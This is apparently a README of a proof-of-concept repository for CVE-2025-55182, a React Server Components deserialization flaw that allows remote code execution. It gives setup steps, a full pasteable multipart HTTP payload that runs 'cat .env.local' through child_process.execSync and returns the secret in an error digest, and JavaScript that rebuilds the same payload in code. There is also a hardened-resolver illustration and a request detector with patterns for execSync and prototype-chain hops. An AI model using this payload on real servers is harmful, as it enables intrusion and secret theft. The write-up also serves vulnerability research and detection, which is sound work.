⚠️ WARNING: This repository is for educational and security research purposes only. Do not use this exploit against systems you do not own or have explicit permission to test.
This repository contains a proof-of-concept demonstration of CVE-2025-55182, a critical pre-authentication remote code execution vulnerability affecting React Server Components.
CVSS Score: 10.0 (Critical)
Affected Versions:
- React 19.0.0, 19.1.0, 19.1.1 and 19.2.0 (the React Server Components implementation shipped in these releases)
- Packages:
  - react-server-dom-parcel
  - react-server-dom-turbopack
  - react-server-dom-webpack
CVE-2025-55182 is an unsafe deserialization vulnerability in the Flight protocol implementation of React Server Components. It lets an unauthenticated attacker execute arbitrary JavaScript on the server by sending a crafted payload that abuses prototype-chain traversal and unsafe property access in the deserializer.
The root cause is how React Server Components deserialize Flight payloads. When a module reference is processed, the code reads properties with bracket notation (moduleExports[metadata[2]]), and bracket access searches the entire JavaScript prototype chain. An attacker can therefore name properties the module never exported, including constructor; the constructor of any function is the global Function constructor, so two such hops hand the attacker a way to compile arbitrary source into a callable function.
By chaining these prototype-chain references with React's internal chunk processing, an attacker builds a payload in which an attacker-controlled string is passed to the Function constructor and executed.
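The following block is an added illustration of the access pattern described above; it is not React's code. The `Chunk` class is a stand-in for a deserialized Flight chunk, and `unsafeResolve` / `safeResolve` are hypothetical resolvers for a `$<id>:a:b` reference path, the first using plain bracket lookups, the second requiring every hop to be an own property.

```javascript
// Added illustration, not React's code: a stand-in for a deserialized Flight
// chunk and two ways of resolving a "$<id>:a:b" reference path over it.
class Chunk {
  constructor(status, value) {
    this.status = status;
    this.value = value;
  }
  // Real Flight chunks are thenables; a stub method is enough for the lookup.
  then(onFulfilled) {
    return onFulfilled(this.value);
  }
}

// Vulnerable pattern: every segment is read with obj[key]. Bracket access
// searches the whole prototype chain, so "constructor", "__proto__" and
// "then" resolve even though the chunk never exposed them as data.
function unsafeResolve(root, path) {
  let cur = root;
  for (const key of path) {
    cur = cur[key];
  }
  return cur;
}

// Hardened variant: each hop must be an own property of a non-function
// object. Anything inherited (constructor, __proto__, then, ...) is rejected.
function safeResolve(root, path) {
  let cur = root;
  for (const key of path) {
    if (cur === null || typeof cur !== "object" ||
        !Object.prototype.hasOwnProperty.call(cur, key)) {
      throw new TypeError(`refusing inherited or missing property "${key}"`);
    }
    cur = cur[key];
  }
  return cur;
}

// Walks the two paths the payload uses, "$1:constructor:constructor" and
// "$1:__proto__:then", and reports what each resolver hands back.
function demo() {
  const chunk = new Chunk("resolved_model", '{"then":"$B1337"}');

  // chunk.constructor is the Chunk class (inherited from Chunk.prototype);
  // a class is a function, and a function inherits .constructor === Function.
  const ctor = unsafeResolve(chunk, ["constructor", "constructor"]);
  const isFunctionCtor = ctor === Function;
  // Holding Function means any attacker string becomes runnable code.
  const result = ctor("return 6 * 7")();

  // The inherited thenable method resolves just as easily.
  const inheritedThen =
    unsafeResolve(chunk, ["__proto__", "then"]) === Chunk.prototype.then;

  let rejected = 0;
  for (const path of [["constructor", "constructor"], ["__proto__", "then"]]) {
    try {
      safeResolve(chunk, path);
    } catch (e) {
      if (e instanceof TypeError) rejected += 1;
    }
  }
  // Own properties still resolve under the hardened rule.
  const ownStillWorks = safeResolve(chunk, ["status"]) === "resolved_model";

  return { isFunctionCtor, result, inheritedThen, rejected, ownStillWorks };
}

console.log(demo());
```

The own-property check is the shape of fix a deserializer needs: it does not matter which gadget (`constructor`, `__proto__`, `then`) the payload names if no inherited property can be reached through a reference path at all.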
- Burp Suite Community or Professional (or any HTTP proxy/client)
- A Next.js project on a vulnerable React version (the setup below uses Next.js 16.0.6)
Create a new project using a Next.js version that bundles the vulnerable React Server Components packages:
npx create-next-app@16.0.6 poc-react2shell
cd poc-react2shell
Or use this repository instead.
Create a .env.local file in the project root so the exploit has a secret to read:
SECRET_API_KEY=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Launch the Next.js development server:
npm run dev
The server should start on http://localhost:3000.
- In Burp Suite, go to the Repeater tab
- Set the target to http://localhost:3000/
- Paste the entire payload below into the request pane (Repeater updates Content-Length for you; with another client, make sure the header matches the body you actually send)
- Send
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 752
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('cat .env.local',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
The response should contain the contents of your .env.local file in the response body: the command output is carried in the digest of the thrown NEXT_REDIRECT error, which Next.js serializes into the response.
The payload consists of three multipart form fields:
Field 0: A fake chunk object containing:
- A prototype-chain reference ($1:__proto__:then)
- A Blob reference ($B1337) that triggers the exploit
- A polluted _response object whose _prefix holds the attacker's JavaScript and whose _formData.get resolves to the Function constructor ($1:constructor:constructor)
Field 1: A reference to field 0 ($@0)
Field 2: An empty array ([])
The JavaScript in _prefix runs cat .env.local through Node.js's child_process.execSync and embeds the output in the digest of a NEXT_REDIRECT error, which is how the result travels back to the client.
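The block below is an added example and not part of the PoC repository. It rebuilds the three-field multipart body shown above from JavaScript objects (so the same request can be scripted instead of pasted into Burp), then runs a heuristic detector over that body and over a constructed benign Server Action body. The boundary, headers, the benign field contents and the `analyzeRequest` / `INDICATORS` names are assumptions for this example.

```javascript
// Added example, not part of the PoC repository: rebuild the three-field body
// shown above from JavaScript objects, then run a heuristic detector over it
// and over a constructed benign Server Action body. Boundary, headers and the
// benign field are constructed for this example.

// Field 0 of the page's payload as a JS object; JSON.stringify produces the
// same reference strings ("$1:__proto__:then", "$B1337", "$Q2", ...).
const maliciousField0 = {
  then: "$1:__proto__:then",
  status: "resolved_model",
  reason: -1,
  value: JSON.stringify({ then: "$B1337" }),
  _response: {
    _prefix: "var res=process.mainModule.require('child_process').execSync('cat .env.local',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    _chunks: "$Q2",
    _formData: { get: "$1:constructor:constructor" },
  },
};

// Serialises [name, value] pairs as multipart/form-data with CRLF line ends,
// the layout of the request above.
function buildMultipart(boundary, fields) {
  let out = "";
  for (const [name, value] of fields) {
    out += `--${boundary}\r\nContent-Disposition: form-data; name="${name}"\r\n\r\n${value}\r\n`;
  }
  return out + `--${boundary}--\r\n`;
}

// Minimal multipart parser (text fields only): returns [{name, value}, ...].
function parseMultipart(contentType, body) {
  const m = /boundary=("?)([^";]+)\1/.exec(contentType);
  if (!m) return [];
  const parts = [];
  for (const seg of body.replace(/\r\n/g, "\n").split("--" + m[2])) {
    if (seg === "" || seg.startsWith("--")) continue; // preamble or final marker
    const part = seg.startsWith("\n") ? seg.slice(1) : seg;
    const split = part.indexOf("\n\n");
    if (split === -1) continue;
    const nameMatch = /name="([^"]*)"/.exec(part.slice(0, split));
    parts.push({
      name: nameMatch ? nameMatch[1] : "",
      value: part.slice(split + 2).replace(/\n$/, ""),
    });
  }
  return parts;
}

// Indicators taken from the payload: Flight references that walk the
// prototype chain, and the private _response fields the payload overrides.
// String matching is a triage heuristic, not a fix; the fix is upgrading React.
const INDICATORS = [
  { name: "prototype-chain reference", re: /\$\d+:(?:__proto__|constructor)\b/ },
  { name: "constructor-of-constructor", re: /:constructor:constructor/ },
  { name: "_response override", re: /"_response"\s*:/ },
  { name: "_prefix override", re: /"_prefix"\s*:/ },
  { name: "_formData override", re: /"_formData"\s*:/ },
  { name: "child_process in body", re: /child_process|execSync/ },
];

// req = { headers: {lowercase-name: value}, body: string }. Only multipart
// Server Action requests (those carrying a Next-Action header) are inspected.
function analyzeRequest(req) {
  const findings = [];
  const ct = req.headers["content-type"] || "";
  if (!("next-action" in req.headers) || !ct.startsWith("multipart/form-data")) {
    return { suspicious: false, findings };
  }
  for (const part of parseMultipart(ct, req.body)) {
    for (const { name, re } of INDICATORS) {
      if (re.test(part.value)) findings.push(`field ${part.name}: ${name}`);
    }
  }
  return { suspicious: findings.length > 0, findings };
}

// Constructed samples: the page's payload and an ordinary Server Action call.
const BOUNDARY = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad";
const HEADERS = {
  "next-action": "x",
  "content-type": `multipart/form-data; boundary=${BOUNDARY}`,
};
const MALICIOUS_REQUEST = {
  headers: HEADERS,
  body: buildMultipart(BOUNDARY, [
    ["0", JSON.stringify(maliciousField0)],
    ["1", JSON.stringify("$@0")],
    ["2", "[]"],
  ]),
};
const BENIGN_REQUEST = {
  headers: HEADERS,
  body: buildMultipart(BOUNDARY, [["0", JSON.stringify(["hello", 42])]]),
};

console.log(analyzeRequest(MALICIOUS_REQUEST));
console.log(analyzeRequest(BENIGN_REQUEST));
```

Legitimate Server Action bodies also use `$`-prefixed Flight references, so the detector keys on the prototype-chain hops and the `_response` overrides rather than on the reference syntax itself; a WAF rule built this way will miss trivially re-encoded variants, which is why it belongs in triage and not in place of the patched packages.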
This vulnerability allows attackers to:
- Execute arbitrary code on the server
- Read sensitive files (environment variables, configuration files, etc.)
- Establish reverse shells
- Exfiltrate data
- Perform any operation the Node.js process has permissions to execute
- CVE-2025-55182 Details
- Next.js-RSC-RCE-Scanner-CVE-2025-66478
- React Security Advisory
- Facebook Security Advisory
- CISA Known Exploited Vulnerabilities Catalog
Want to exploit CVE-2025-55182 in a hands-on CTF environment? Check out OSS OopsSec Store, a deliberately vulnerable lab designed for offensive security training. This CVE is implemented as one of the flags!
This proof of concept is provided for educational purposes and security research only. Always ensure you have explicit written permission before testing security vulnerabilities on any system.
